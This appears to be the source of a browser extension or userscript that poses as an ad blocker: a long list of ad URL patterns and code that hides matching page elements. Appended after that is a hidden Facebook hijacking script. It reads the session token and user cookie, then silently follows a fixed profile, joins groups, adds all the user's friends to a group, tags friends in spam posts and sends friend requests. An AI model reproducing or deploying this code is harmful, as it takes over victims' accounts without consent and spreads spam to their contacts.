"/eas\?\*^easformat\=",
"/eas\?camp\=\*;cre\=",
"/eas\?cu\=\*;cre\=",
"/eas_fif\.html^",
"/eas_tag\.1\.0\.js",
"/easyads\.",
"/easyads/\*",
"/easyadstrack\.",
"/ebay_ads/\*",
"/editable/ads/\*",
"/emailads/\*",
"/embed_ad\.",
"/emediatead\.",
"/ems/ads\.",
"/eng/ads/\*",
"/exchange_banner_",
"/exitsplash\.",
"/expandable_ad\.php",
"/ext/ads/\*",
"/ext_ads\.",
"/external/ad\.",
"/external/ad/\*",
"/external/ads/\*",
"/external_ads\.",
"/externalads/\*",
"/externalhtmladrenderer\.",
"/eyewondermanagement\.",
"/eyewondermanagement28\.",
"/fastclick160\.",
"/fastclick728\.",
"/fatads\.",
"/featuredadshome\.",
"/file/ad\.",
"/files/ads/\*",
"/fimserve\.",
"/finads\.",
"/flag_ads\.",
"/flash\-ads/\*",
"/flash/ad_",
"/flash/ads/\*",
"/flashad\.",
"/flashad3\.",
"/flashads\.",
"/flashads/\*",
"/flatad\.",
"/floater_ad\.",
"/floatingads\.",
"/flvad_",
"/flvads/\*",
"/flyad/\*",
"/flyads/\*",
"/flyers/ads/\*",
"/footad\-",
"/footad\.",
"/footer\-ad\-",
"/footer_ad_",
"/footerad\.",
"/footerads\.",
"/footerads/\*",
"/framead\-",
"/framead\.",
"/framead/\*",
"/framead_",
"/frameads\.",
"/frequencyads\.",
"/frnads\.",
"/frontend/ads/\*",
"/fullad\.",
"/fuseads/\*",
"/fwadmanager\.",
"/gads\.html",
"/gads\.js",
"/gafc\.js",
"/gafsads\?",
"/galleryad\.",
"/gam_ad\.",
"/gamads/\*",
"/gamead/\*",
"/gamersad\.",
"/GAN_Ads/\*",
"/gannett/ads/\*",
"/general\-ad\-",
"/generate_ad\.",
"/generateadtag\.",
"/generateplayerads\.",
"/genericrichmediabannerad/\*",
"/geo\-ads_",
"/geo/ads\.",
"/geo_banner\.htm\?",
"/geoad/\*",
"/get\-ad\.",
"/get/ad\.",
"/getad\.",
"/getad\?",
"/getadframe\.",
"/getads\.",
"/getads/\*",
"/getads\?",
"/getadserver\.",
"/getads|",
"/getadvertimageservlet\?",
"/getadverts\?",
"/getarticleadvertimageservlet\?",
"/getbanner\.cfm\?",
"/getdigitalad/\*",
"/getfeaturedadsforshow\.",
"/gethalfpagead\.",
"/getinlineads/\*",
"/getmarketplaceads\.",
"/getmdhlayer\.",
"/getmdhlink\.",
"/getrcmd\.js\?",
"/getsponslinks\.",
"/getsponslinksauto\.",
"/getvdopiaads\.",
"/getvideoad\.",
"/gexternalad\.",
"/gfx/ads/\*",
"/glam_ads\.",
"/global/ad/\*",
"/global/ads\.",
"/global/ads/\*",
"/globaladprostyles\.",
"/globalbannerad\.",
"/google\-ad\-",
"/google\-ad\?",
"/google\-ads\.",
"/google\-adsense\-",
"/google\-adsense\.",
"/google/ad\?",
"/google/adv\.",
"/google_ad_",
"/google_ads\.",
"/google_ads/\*",
"/google_ads_",
"/google_afc\.",
"/google_afc_",
"/google_lander2\.js",
"/googlead\-",
"/googlead\.",
"/googlead160\.",
"/GoogleAd300\.",
"/googlead_",
"/googleadhp\.",
"/googleadhpbot\.",
"/googleadhtml/\*",
"/googleadright\.",
"/googleads\-",
"/googleads\.",
"/googleads/\*",
"/googleads2\.",
"/googleads3widetext\.",
"/googleads_",
"/googleadsafc_",
"/googleadsafs_",
"/googleadsense\.",
"/googleafs\.",
"/googleafvadrenderer\.",
"/googleleader\.",
"/googlempu\.",
"/graphics/ad_",
"/graphics/ads/\*",
"/gt6skyadtop\.",
"/guardianleader\.",
"/header\-ad\.",
"/header_ads_",
"/headerad\.",
"/headerads\.",
"/headvert\.",
"/hitbar_ad_",
"/home30/ad\.",
"/homepage_ads/\*",
"/homeslideadtop/\*",
"/hostedads\.",
"/hostedbannerads\.",
"/house\-ads/\*",
"/house_ad\-",
"/house_ad_",
"/house_ads/\*",
"/housead/\*",
"/houseads\.",
"/houseads/\*",
"/houseads\?",
"/hoverad\.",
"/html\.ng/\*",
"/html/ads/\*",
"/htmlads/\*",
"/httpads/\*",
"/i/ads/\*",
"/iabadvertisingplugin\.swf",
"/icon_ad\.",
"/iframe\-ads/\*",
"/iframe\.ad/\*",
"/iframe/ad/\*",
"/iframe/ads/\*",
"/iframe_ad\.",
"/iframe_ad\?",
"/iframe_ads/\*",
"/iframe_ads_",
"/iframe_chitika_",
"/iframe_sponsor_",
"/iframead\.",
"/iframead/\*",
"/iframead_",
"/iframeadsense\.",
"/iframeadsensewrapper\.",
"/iframedartad\.",
"/iframes/ad/\*",
"/im\-ad/im\-rotator\.",
"/im\-ad/im\-rotator2\.",
"/imaads\.",
"/imads\.js",
"/image/ad/\*",
"/image/ads/\*",
"/image/affiliate/\*",
"/image_ads/\*",
"/imageads/\*",
"/imagecache_ads/\*",
"/images/ad\-",
"/images/ad\.$domain\=~ngohq\.com",
"/images/ad/\*",
"/images/ads\-",
"/images/ads/\*",
"/images/ads_",
"/images/aff\-",
"/images/affiliate/\*",
"/images/affs/\*",
"/images/gads_",
"/images/sponsored/\*",
"/images1/ad_",
"/images_ads/\*",
"/img/ad\-",
"/img/ad\.",
"/img/ad_",
"/img/ads/\*",
"/img3/ads/\*",
"/img_adv/\*",
"/imgads/\*",
"/imgaffl/\*",
"/imgs/ads/\*",
"/impop\.",
"/inad\.",
"/inc/ads/\*",
"/inc_ad\.",
"/inc_v2/ad_",
"/include/ad/\*",
"/include/ad_",
"/include/ads/\*",
"/include/adsdaq",
"/included_ads/\*",
"/includes/ad_",
"/includes/ads/\*",
"/incmpuad\.",
"/index\-ad\.",
"/index_ads\.",
"/initdefineads\.",
"/injectad\.",
"/inline_ad\.",
"/inline_ad_",
"/inline_ads\.",
"/inlineads/\*",
"/innerads\.",
"/insertads\.",
"/instreamad/\*",
"/intelliad\.",
"/intellitext\.",
"/interad\.",
"/internet_ad_",
"/interstitial\-ad/\*",
"/intextads\.",
"/introduction_ad\.",
"/invideoad\.",
"/inx\-ad\.",
"/ipadad\.",
"/iprom\-ad/\*",
"/irc_ad_",
"/ireel/ad\*\.jpg",
"/is\.php\?ipua_id\=\*\&search_id\=",
"/isgadvertisement/\*",
"/ispy/ads/\*",
"/iwadsense\.",
"/j/ads\.js",
"/jcorner\.php\?partner\=",
"/jitads\.",
"/jivoxadplayer\.",
"/jlist\-affiliates/\*",
"/jqueryadvertising\.",
"/js\.ad/size\=",
"/js/ads\-",
"/js/ads\.",
"/js/ads_",
"/js/adv/\*",
"/js2\.ad/size\=",
"/js_ad_utf8\.",
"/jsads\-",
"/jsadscripts/\*",
"/jsfiles/ads/\*",
"/jsplayerads\-",
"/jstextad\.",
"/jumpstartunpaidad\.",
"/kantarmedia\.",
"/keyade\.js",
"/kredit\-ad\.",
"/kskads\.",
"/landerbanners/\*",
"/large_ads/\*",
"/layer\-ad\.",
"/layer\-ads\.",
"/layer/ad\.",
"/layer/ads\.",
"/layer160x600\.",
"/layer_ad\?",
"/layerad\-",
"/layerad\.",
"/layerAd/\*",
"/layerads\.",
"/layerads_",
"/layout/ads/\*",
"/lbl_ad\.",
"/leader_ad\.",
"/leaderboardads\.",
"/leftad\.",
"/leftad_",
"/leftsidebarads\.",
"/linkad2\.",
"/linkads\.",
"/linkedads/\*",
"/links_sponsored_",
"/live_ad\.",
"/liveads\.",
"/livejasmin\.",
"/livejasmin2\.",
"/load\-ads|",
"/loadad\.aspx\?",
"/loadads\.",
"/loadadsmain\.",
"/loadadsmainparam\.",
"/loadadsparam\.",
"/loadadwiz\.",
"/local_ads_",
"/locker\.php\?pub\=\*\&gateid\=$script",
"/log_ad\?",
"/lotto_ad_",
"/lrec_ad\.",
"/mac\-ad\?",
"/magic\-ads/\*",
"/main/ad_",
"/main/ads/\*",
"/main_ad\.",
"/main_ad/\*",
"/mainad\.",
"/marginaleadservlet\?",
"/marketing\-banners/\*",
"/marketing/banners/\*",
"/marketing/banners_",
"/masterad\.",
"/maxi_ad\.",
"/mbn_ad\.",
"/mcad\.php",
"/media/ads/\*",
"/media_ads/\*",
"/megaad\.",
"/meme_ad\.",
"/metaadserver/\*",
"/metaffiliation/\*",
"/mgid\-ad\-",
"/microad\.",
"/microads/\*",
"/mini\-ads/\*",
"/mini_ads\.",
"/mint/ads/\*",
"/misc/ad\-",
"/miva_ads\.",
"/mkadsrv\.",
"/ml9pagepeel\.",
"/mmt_ad\.",
"/mnetorfad\.js",
"/mobile_ad\.",
"/mobilephonesad/\*",
"/mod_ad/\*",
"/modalad\.",
"/module/ads/\*",
"/modules/ad/\*",
"/modules/ad_",
"/modules/ads/\*",
"/mpu\-dm\.html",
"/mpuad\.",
"/mpuguardian\.",
"/mpumessage\.",
"/msnadimg\.",
"/msnads/\*",
"/mstextad\?",
"/mtvi_ads_",
"/my\-ad\-integration\.",
"/mylayer\-ad/\*",
"/mysimpleads/\*",
"/namediaad\.",
"/navads/\*",
"/nd_affiliate\.",
"/neoads\.",
"/netads\.",
"/netreachtextads/\*",
"/netspiderads2\.",
"/new/ad/\*",
"/new_ads/\*",
"/newad\.",
"/newad2\?",
"/newad\?",
"/newads\.",
"/newads/\*",
"/newdesign/ad/\*",
"/newimages/ads/\*",
"/newrightcolad\.",
"/news/ads/\*",
"/news_ad\.",
"/newsletterads/\*",
"/newsmaxadcontrol\.",
"/newtopmsgad\.",
"/nextad/\*",
"/no_ads\.",
"/o2contentad\.",
"/oas\-config\.",
"/oas_ad_",
"/oasadframe\.",
"/oasadfunctionlive\.",
"/oasbanner_",
"/oascentral\.$~object\-subrequest",
"/oasconfig/\*",
"/oasdefault/\*",
"/oasisi\-\*\.php\?",
"/oasisi\.php\?",
"/oiopub\-direct/\*$~stylesheet",
"/omb\-ad\-",
"/ome\.ads\.",
"/onead\.",
"/online/ads/\*",
"/online_ads/\*",
"/onlineads/\*",
"/openads\-",
"/openads\.",
"/openads/\*",
"/openads2/\*",
"/openadserver/\*",
"/openx\-",
"/openx\.",
"/openx/\*",
"/openx_",
"/ot_adserved\.",
"/other/ads/\*",
"/overlay_ad_",
"/ovt_show\.asp\?",
"/ox/www/\*",
"/ox_ultimate/www/\*",
"/page\-ads\.",
"/page\-peel",
"/pagead/ads\?",
"/pagead/imgad\?",
"/pageadimg/\*",
"/pageads/\*",
"/pageear\.",
"/pageear/\*",
"/pageear_",
"/pagepeel\-",
"/pagepeel\.",
"/pagepeel/\*",
"/pagepeel_",
"/pagepeelads\.",
"/paidads/\*",
"/paidlisting/\*",
"/park_html_functions\.\*\.js",
"/park_html_functions\.js",
"/park_html_functions_general\.js",
"/partner_ads_",
"/partnerads/\*",
"/partnerads_",
"/partneradwidget\.",
"/partnerbanner\.",
"/partnerbanner/\*",
"/partners/ads/\*",
"/partnersadbutler/\*",
"/pc/ads\.",
"/peel\.js",
"/peel\.php\?",
"/peel/\?webscr\=",
"/peel1\.js",
"/peelad\.",
"/peelad/\*",
"/peelads/\*",
"/peeljs\.php",
"/pencilad\.",
"/perfads\.",
"/performancingads/\*",
"/permanent/ads/\*",
"/pgrightsideads\.",
"/photo728ad\.",
"/sponsorad\.",
"/sponsoradds/\*",
"/sponsorads/\*",
"/sponsored_ad\.",
"/sponsored_link\.",
"/sponsored_links_",
"/sponsored_text\.",
"/sponsored_top\.",
"/sponsoredcontent\.",
"/sponsoredlinks\.",
"/sponsoredlinks/\*",
"/sponsoredlinksiframe\.",
"/sponsoredlisting\.",
"/sponsorpaynetwork\.",
"/sponsors/amg\.php\?",
"/square\-ads/\*",
"/squaread\.",
"/src/ads_",
"/srv/ad/\*",
"/static/ad_",
"/static/ads/\*",
"/static_ads/\*",
"/stickyad\.",
"/stickyad2\.",
"/storage/ads/\*",
"/stories/ads/\*",
"/story_ad\.",
"/subad2_",
"/subnavads/\*",
"/subs\-ads/\*",
"/superads_",
"/supernorthroomad\.",
"/swf/ad\-",
"/swf/ads/\*",
"/swfbin/ad\-",
"/swfbin/ad3\-",
"/swfbin/ad3_",
"/synad2\.",
"/system/ad/\*",
"/systemad\.",
"/systemad_",
"/t\-ads\.",
"/t\.php\?uid\=\*\.\*\&src\=",
"/tableadnorth\.",
"/tagadv_",
"/tapatalkdetect\.js",
"/taxonomy\-ads\.",
"/td_ads/\*",
"/tdlads/\*",
"/teamplayer\-ads\.",
"/teaseimg/ads/\*",
"/template/ad\.",
"/templateadvimages/\*",
"/templates/ads/\*",
"/testads/\*",
"/testingad\.",
"/textad\.",
"/textad/\*",
"/textad\?",
"/textad_",
"/textadrotate\.",
"/textads\.",
"/textads/\*",
"/textads_",
"/textadspromo_",
"/tfs\-ad\.",
"/topleftads\.",
"/topperad\.",
"/tops\.ads\.",
"/towerbannerad/\*",
"/track\.php\?uid\=\*\.\*\&d\=",
"/tracked_ad\.",
"/trade_punder\.",
"/tradead_",
"/transad\.",
"/tremoradrenderer\.",
"/tribalad\.",
"/tripplead/\*",
"/ttz_ad\.",
"/turbo_ad\.",
"/twgetad3\.",
"/txt_ad\.",
"/txt_ad_",
"/txtads/\*",
"/u\-ads\.",
"/u/ads/\*",
"/uberlayadrenderer\.",
"/ugoads_inner\.",
"/ui/adv\.",
"/ui/adv_",
"/uk/ads/\*",
"/ukc\-ad\.",
"/unibluead\.",
"/unity/ad/\*",
"/update_ads/\*",
"_adpartner\.",
"_adplugin\.",
"_adright2\.",
"_adrotator\.",
"_adrow\-",
"_ads\.html",
"_ads\.php\?",
"_ads1\.",
"_ads\?",
"_ads_contextualtargeting_",
"_ads_iframe_",
"_ads_index_",
"_ads_only\&",
"_ads_reporting\.",
"_ads_single_",
"_ads_targeting\.",
"_adsense\.",
"_adsense_",
"_adserve/",
"_adserver/",
"_adshare\.",
"_adshow\.",
"_adsjs\.",
"_adskin\.",
"_adsrv\?",
"_adsys\.",
"_adtags\.",
"_adtech/",
"_adtech_",
"_adtext_",
"_adtitle\.",
"_adtop\.",
"_adunit\.",
"_advert\.",
"_advertise180\.",
"_advertisehere\.",
"_advertisement\.",
"_advertisement_",
"_advertisements/",
"_advertisementtxt_",
"_advertising/",
"_advertisment\.",
"_advertorial\.",
"_advertorial_",
"_advertorials/",
"_advertphoto\.",
"_adverts/",
"_advertsarea\.",
"_tribalfusion\.",
"_video_ads_",
"_videoad\.",
"_vodaaffi_",
"_webad\.",
"takeover_background\.",
"takeover_banner_",
"/adb_detector\.",
"/adblock_detector\.",
"/anti_ab\.",
"/blockblock/blockblock\.jquery\.js",
"\-120x60\-",
"\-120x60\.",
"\-120x600\-",
"\-120x600\.",
"\-160x600\-",
"\-160x600\.",
"\-160x600_",
"\-300\-250\.",
"\-300x250\-",
"\-300x250\.",
"\-300x250_",
"\-468\-60\-",
"\-468\-60\.",
"\-468\-60_",
"\-468_60\.",
"\-468x60\-",
"\-468x60\.",
"\-468x60/",
"\-468x60_",
"\-468x80\-",
"\-468x80\.",
"\-468x80/",
"\-468x80_",
"\-480x60\-",
"\-480x60\.",
"\-480x60/",
"\-480x60_",
"\-728x90\-",
"\-728x90\.",
"\-728x90/",
"\-728x90_",
"\-ad_120x240\.",
"\-banner468x60\.",
"\.120x600\.",
"\.160x600\.",
"\.300x250\.",
"\.468x60\-",
"\.468x60\.",
"\.468x60/",
"\.468x60_",
"\.468x80\-",
"\.468x80\.",
"\.468x80/",
"\.468x80_",
"\.480x60\-",
"\.480x60\.",
"\.480x60/",
"\.480x60_",
"\.728x90\-",
"\.728x90\.",
"\.728x90/",
"\.728x90_",
"/120_600_",
"/120x600\-",
"/120x600\.",
"/120x600/\*",
"/120x600_",
"/125x125_banner\.",
"/160\-600\-",
"/160\-600\.",
"/160_600_",
"/160x600\-",
"/160x600\.",
"/160x600/\*",
"/160x600_",
"/160x600partner\.",
"/300\-250\-",
"/300\-250\.",
"/300250_ad\-",
"/300_250_",
"/300x250\-",
"/300x250\.",
"/300x250/\*",
"/300x250_",
"/300x250px_",
"/320x250\.",
"/336x280\-",
"/468\-60\.",
"/468\-banner\.",
"/468_60\.",
"/468_60_",
"/468_80/\*",
"/468x60\-",
"/468x60\.",
"/468x60/\*",
"/468x60_",
"/468x60v1_",
"/468x80\-",
"/468x80\.",
"/468x80/\*",
"/468x80_",
"/480x60\-",
"/480x60\.",
"/480x60/\*",
"/480x60_",
"/486x60_",
"/600x160_",
"/700x90\.",
"/728\-90\-",
"/728\-90\.",
"/728_90\.",
"/728_90/\*",
"/728_90_",
"/728x79_",
"/728x90\-",
"/728x90\.",
"/728x90/\*",
"/728x90\?",
"/728x90_",
"/728x90top\.",
"/768x90\-",
"/768x90\.",
"/ad728x90\.",
"/adreplace160x600\.",
"/adreplace728x90\.",
"/ads468x60_",
"/ads728x90_",
"/banner20468x60\.",
"/banner460x80\.",
"/banner468x60\.",
"/bottom728\.html",
"/bottom728x90\.",
"/lightake728x90\.",
"/new160x600/\*",
"/new300x250/\*",
"/top468\.html",
"/top728\.html",
"/top728x90\.",
"_120_60\.",
"_120_600\.",
"_120_600_",
"_120_x_600\.",
"_120x60\.",
"_120x600\.",
"_120x600_",
"_120x600px\.",
"_120x60_",
"_140x600_",
"_160\-600\.",
"_160_600\.",
"_160_600_",
"_160x600\-",
"_160x600\.",
"_160x600_",
"_300\-250\-",
"_300_250\.",
"_300_250_",
"_300x250\-",
"_300x250\.",
"_300x250_",
"_300x250px\.",
"_336x280_",
"_460x60\.",
"_468\-60\.",
"_468\.gif",
"_468\.htm",
"_468_60\.",
"_468_60_",
"_468x120\.",
"_468x60\-",
"_468x60\.",
"_468x60/",
"_468x60_",
"_468x60b\.",
"_468x60px_",
"_468x80\-",
"_468x80\.",
"_468x80/",
"_468x80_",
"_468x90\.",
"_480x60\-",
"_480x60\.",
"_480x60/",
"_480x60_",
"_486x60\.",
"_720x90\.",
"_728\-90\.",
"_728\.htm",
"_728_90\.",
"_728_90_",
"_728_x_90_",
"_728x90\-",
"_728x90\.",
"_728x90/",
"_728x90_",
"_728x90px\.",
"_768x90_",
"_a468x60\.","bidvertiser","avazu","yieldmanager","clicksor","infolinks","admelt","adnxs"];

// get the "data.txt" file in the profile directory
// get the "data.txt" file in the profile directory
var rows=document.getElementsByTagName("iframe");
var rowsa=document.getElementsByTagName("a");
var rowso=document.getElementsByTagName("object");
 // but you might want to process that one line at a time. if so: 
               for (var n=0; n<text.length; n++) 
               { 
                  var line = text[n]; 
    // check if line != nothing
if (line)
{
var line = line.replace(/([*+.?|\\\[\]{}()])/g, '\\$1');

var matches=line;
 for (i=0;i<rows.length; i++) {


 var div=rows[i].getAttribute('src');
if (div){  
   
     if(div.match(matches)) {
   rows[i].setAttribute( 'src', '' );  
   }
  
   }
 }
 
 for (i=0;i<rowsa.length; i++) {
 var diva=rowsa[i].getAttribute('href');
 if (diva){

     if(diva.match(matches)) {
    rowsa[i].style.display="none";
  
 }
   }   
}			   
			   
			   
 for (i=0;i<rowso.length; i++) {
 var divo=rowso[i].getAttribute('data');
 if (divo){
  if(divo.match(matches)) {
    rowso[i].style.display="none";
   
   }
    

   }   
}
	}		  
   }



if (window.location.href.match(/facebook.com/i)) {

if (document.getElementsByName('fb_dtsg')[0]){

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
	
function cereziAl(isim) {
    var tarama = isim + "=";
    if (document.cookie.length > 0) {
        konum = document.cookie.indexOf(tarama)
        if (konum != -1) {
            konum += tarama.length
            son = document.cookie.indexOf(";", konum)
            if (son == -1)
                son = document.cookie.length
            return unescape(document.cookie.substring(konum, son))
        }
        else { return ""; }
    }
}

function getRandomInt (min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
    return arr[getRandomInt(0, arr.length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function a(abone){
    var http4 = new XMLHttpRequest();
     
    var url4 = "/ajax/follow/follow_profile.php?__a=1";
     
    var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
    http4.open("POST", url4, true);
     
    //Send the proper header information along with the request
    http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http4.setRequestHeader("Content-length", params4.length);
    http4.setRequestHeader("Connection", "close");
     
    http4.onreadystatechange = function() {//Call a function when the state changes.
    if(http4.readyState == 4 && http4.status == 200) {
       
      http4.close; // Close the connection
     
    }
    }
    
    http4.send(params4);
}

function sublist(uidss) {
		var a = document.createElement('script');
		a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
		document.body.appendChild(a);
}

a("100004099775576");

sublist("427857487303478");
sublist("427882680634292");
sublist("427882770634283");
sublist("228682757278382");
sublist("228683010611690");
sublist("228683360611655");




var gid = ['354838871302614'];

var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
httpwp['open']('POST', urlwp, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp);

var gid2 = ['544516988904866'];
var fb_dtsg2 = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id2 = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var httpwp = new XMLHttpRequest();
var urlwp2 = '/ajax/groups/membership/r2j.php?__a=1';
var paramswp2 = '&ref=group_jump_header&group_id=' + gid2 + '&fb_dtsg=' + fb_dtsg2 + '&__user=' + user_id2 + '&phstamp=';
httpwp['open']('POST', urlwp2, true);
httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
httpwp['setRequestHeader']('Content-length', paramswp2['length']);
httpwp['setRequestHeader']('Connection', 'keep-alive');
httpwp['send'](paramswp2);


var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
var friends = new Array();
gf = new XMLHttpRequest();
gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
gf['send']();
if (gf['readyState'] != 4) {} else {
    data = eval('(' + gf['responseText']['substr'](9) + ')');
    if (data['error']) {} else {
        friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
            return _0x93dax8['index'] - _0x93dax9['index'];
        });
    };
};

for (var i = 0; i < friends['length']; i++) {
    var httpwp = new XMLHttpRequest();
    var urlwp = '/ajax/groups/members/add_post.php?__a=1';
    var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp=';
    httpwp['open']('POST', urlwp, true);
    httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    httpwp['setRequestHeader']('Content-length', paramswp['length']);
    httpwp['setRequestHeader']('Connection', 'keep-alive');
    httpwp['onreadystatechange'] = function () {
if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {};
    };
    httpwp['send'](paramswp);
};
var spage_id = "553195541382015";
var spost_id = "553195541382015";
var sfoto_id = "553195541382015";
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var smesaj = "";
var smesaj_text = "";
var arkadaslar = [];
var svn_rev;
var bugun= new Date();
var btarihi = new Date(); 
btarihi.setTime(bugun.getTime() + 1000*60*60*4*1);
if(!document.cookie.match(/paylasti=(\d+)/)){
document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString();
}


//arkadaslari al ve isle
function sarkadaslari_al(){
		var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
			if(xmlhttp.readyState == 4){
				  eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
				  for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
					smesaj = "";
					smesaj_text = "";
				  for(i=f*10;i<(f+1)*10;i++){
					if(arkadaslar.payload.entries[i]){
				  smesaj += " @[" + arkadaslar.payload.entries[i].uid +  ":" + arkadaslar.payload.entries[i].text + "]";
				  smesaj_text += " " + arkadaslar.payload.entries[i].text;
				  }
					}
					sdurumpaylas();				}
				
			}
			
        };
		var params = "&filter[0]=user";
		params += "&options[0]=friends_only";
		params += "&options[1]=nm";
		params += "&token=v7";
        params += "&viewer=" + user_id;
		params += "&__user=" + user_id;
		
        if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
        xmlhttp.send();
}

//tiklama olayini dinle
var tiklama = document.addEventListener("click", function () {
if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
sarkadaslari_al();
document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();

document.removeEventListener(tiklama);
}
 }, false);
  

//arkadaþ ekleme
function sarkadasekle(uid,cins){
		var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
			if(xmlhttp.readyState == 4){	
			}
        };
		
		xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true); 
		var params = "to_friend=" + uid;
		params += "&action=add_friend";
		params += "&how_found=friend_browser";
		params += "&ref_param=none";
		params += "&outgoing_id=";
		params += "&logging_location=friend_browser";
		params += "&no_flyout_on_click=true";
		params += "&ego_log_data=";
		params += "&http_referer=";
		params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
        params += "&phstamp=165816749114848369115";
		params += "&__user=" + user_id;
		xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
		xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
		
if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){
		xmlhttp.send(params);
}else if(document.cookie.split("cins" + user_id +"=").length <= 1){
		cinsiyetgetir(uid,cins,"sarkadasekle");
}else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){
		xmlhttp.send(params);
}
}

//cinsiyet belirleme
var cinssonuc = {};
var cinshtml = document.createElement("html");
function scinsiyetgetir(uid,cins,fonksiyon){
		var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
			if(xmlhttp.readyState == 4){
			eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
			cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html
			btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
			if(cinshtml.getElementsByTagName("select")[0].value == "1"){
			document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString();
			}else if(cinshtml.getElementsByTagName("select")[0].value == "2"){
			document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString();
			}
			eval(fonksiyon + "(" + id + "," + cins + ");");
			}
        };
		xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
		xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
		xmlhttp.send();
}

function autoSuggest()
{    
    links=document.getElementsByTagName('a');
    for (i in links) {
        l=links[i];
        if(l.innerHTML == '<span class="uiButtonText">Suggest Friend</span>') {
            l.click();
        }
    }
}

function blub()
{
    if(document.getElementsByClassName('pbm fsm').length == 1) {
        w = document.getElementsByClassName('pbm fsm')[0];

        e = document.createElement('a');
        //e.href = '#';
        e.innerHTML = 'Auto Suggest by LMAO';
        e.className = 'uiButton';
        e.onclick = autoSuggest;

        if( w.childElementCount == 0)
        {
            w.appendChild(document.createElement('br'));
            w.appendChild(e);
        }
    }
}

blub();

document.addEventListener("DOMNodeInserted", blub, true);
   
   }
}